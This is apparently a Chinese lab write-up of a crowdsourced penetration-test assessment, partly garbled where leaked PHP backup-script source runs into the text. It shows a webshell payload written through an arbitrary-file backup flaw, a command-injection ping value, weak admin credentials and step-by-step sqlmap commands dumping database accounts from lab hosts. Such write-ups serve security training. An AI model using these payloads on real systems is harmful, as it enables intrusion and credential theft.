行业新闻

记一次某众测的考核

18 Nov, 2020 行业新闻

记一次某众测的考核

本文涉及靶场知识点实操练习——(留空为本目录)br>文件保存名称:input name="zipname"type="text"id="zipname"value="bak_wwwroot.zip"class="xxp">(.zip)br>br>input name="password"type="hidden"id="password"value="?php echo $_POST['password'];?>">input name="myaction"type="hidden"id="myaction"value="dozip">input type="submit"name="Submit"class="sub"value=" 开始备份">functioncreatefile(){$endstr="\x50\x4b\x05\x06\x00\x00\x00\x00".pack('v',$this->file_count).pack('v',$this->file_count).pack('V',$this->dirstr_len).pack('V',$this->datastr_len)."\x00\x00";fwrite($this->fp,$this->dirstr.$endstr);fclose($this->fp);}}if(is_array($_REQUEST[dfile])){$faisunZIP=newPHPzip;if($faisunZIP->startfile("$_REQUEST[todir]$_REQUEST[zipname]")){echo"正在添加备份文件...br>br>";$filenum=0;foreach($_REQUEST[dfile]as$file){if(is_file($file)){echo"文件: $filebr>";}else{echo"目录: $filebr>";}$filenum+=listfiles($file);}$faisunZIP->createfile();echo"br>备份完成,共添加 $filenum个文件.br>a href='$_REQUEST[todir]$_REQUEST[zipname]'>$_REQUEST[todir]$_REQUEST[zipname](".num_bitunit(filesize("$_REQUEST[todir]$_REQUEST[zipname]")).")/a>";}else{echo"$_REQUEST[todir]$_REQUEST[zipname]不能写入,请检查路径或权限是否正确.br>";}}else{echo"没有选择的文件或目录.br>";}endif;?>

审计代码,这里的dfile参数任何的过滤,尝试修改一下dfile的值,惊喜的发现可以读取任意文件,并写入bak_wwwroot.zip,下载bak_wwwroot.zip就可以读取了。

dfile[]=/var/www/html/index.php?php system($_GET[cmd])?>q=0.8,en-us;q=0.5,en;q=0.3
  • Cookie为screenX=1024; screenY=7681605668578_5fb48ee25763a72ec7612.png
    • 第四题
    网站文件备份服务器
    虽然页面和第二题不同,但是扫目录同样扫出了是一样的后台,爆破弱口令,然后发现admin和admin,剩下的就和之前的步骤是一样的了,写一个马然后读key。
    dfile%5B%5D=/?php system($_GET[cmd])?>替代绕过
    先用ls读取文件目录
    iipp=127.0.0.1%26%26ls&submit=Ping
    然后再读取key即可1605668591_5fb48eefb52ba8758fa12.png
    第六题
    教学质量评价系统
    发现有个注入点
    http://119.3.177.25:41204/show.php?id=MQ0=
    测试了一下发现是base64盲注,用tamper指定base64编码,直接丢sqlmap里面跑一下。
    这里要注意的是这个靶场不太稳定,我们用sqlmap有个小问题就是盲注的时候他会根据响应速度来调整发送包的速度,太快了可能网站会崩,所以sqlmap会增加延迟,让他更像是人手工在注入,我觉得慢就断开了,但是如果不清理缓存每次重来就是从上一次继续,所以这里的话加上fresh-queries,再加上batch自动确认。
    跑数据库
    python3 sqlmap.py -u http://119.3.177.25:41204/show.php?id=1* --tamper base64encode.py --dbs --dump --batch --fresh-queries
    跑表名
    python3 sqlmap.py -u http://119.3.177.25:41204/show.php?id=1* --tamper base64encode.py --tables -D test --dump --batch --fresh-queries
    跑列名
    python3 sqlmap.py -u http://119.3.177.25:41204/show.php?id=1* --tamper base64encode.py --columns -D test -T data --dump --batch --fresh-queries
    最后payload如下
    python3 sqlmap.py -u http://119.3.177.25:41204/show.php?id=1* --tamper base64encode.py -D test -T data -C thekey --dump --batch --fresh-queries
    直接跑出key1605668602_5fb48efa3948239b0900c.png
    第七题
    XWAY科技管理系统
    平台停机维护的通知存在注入,发现注入点在
    http://119.3.225.8:41046/new_list.php?id=1
    继续sqlmap跑起来,
    跑数据库
    python3 sqlmap.py -u http://119.3.225.8:41046/new_list.php?id=1 --dbs --dump --batch
    跑表名
    python3 sqlmap.py -u http://119.3.225.8:41046/new_list.php?id=1 --tables -T member --dump --batch
    跑列名
    python3 sqlmap.py -u http://119.3.225.8:41046/new_list.php?id=1 --columns -T member -D stormgroup --dump --batch
    最后payload
    python3 sqlmap.py -u http://119.3.225.8:41046/new_list.php?id=1 -D stormgroup -T member -C name,password --dump --batch
    跑出两个账号密码
    • mozhe/528469
    • mozhe/888054
    登录之后,即可拿到key。
    第八题
    XWAY电脑采购系统
    随便看了发现到一个注入点
    http://119.3.187.27:41144/new_list.php?id=1
    发现是union注入,依旧尝试用sqlmap
    跑数据库
    python3 sqlmap.py -u http://119.3.187.27:41144/new_list.php?id=1 --dbs --dump --batch
    跑表名
    python3 sqlmap.py -u http://119.3.187.27:41144/new_list.php?id=1 --tables -D min_ju4t_mel1i --dump --batch
    跑列名
    python3 sqlmap.py -u http://119.3.187.27:41144/new_list.php?id=1 --columns -D min_ju4t_mel1i -T (@dmin9_td4b} --dump --batch
    最后payload
    python3 sqlmap.py -u http://119.3.187.27:41144/new_list.php?id=1 -D min_ju4t_mel1i -T (@dmin9_td4b} -C username,password --dump --batch
    最后跑出五个账号密码,只有一个能用,md5解密登录拿key。
    sql注入不愧是OWASP TOP 10 之 榜首,10道题目出现了3道,有一说一sqlmap真的是好用。
    本文首发于“合天网安实验室” 作者:kawhi

    合天网安复现

    关闭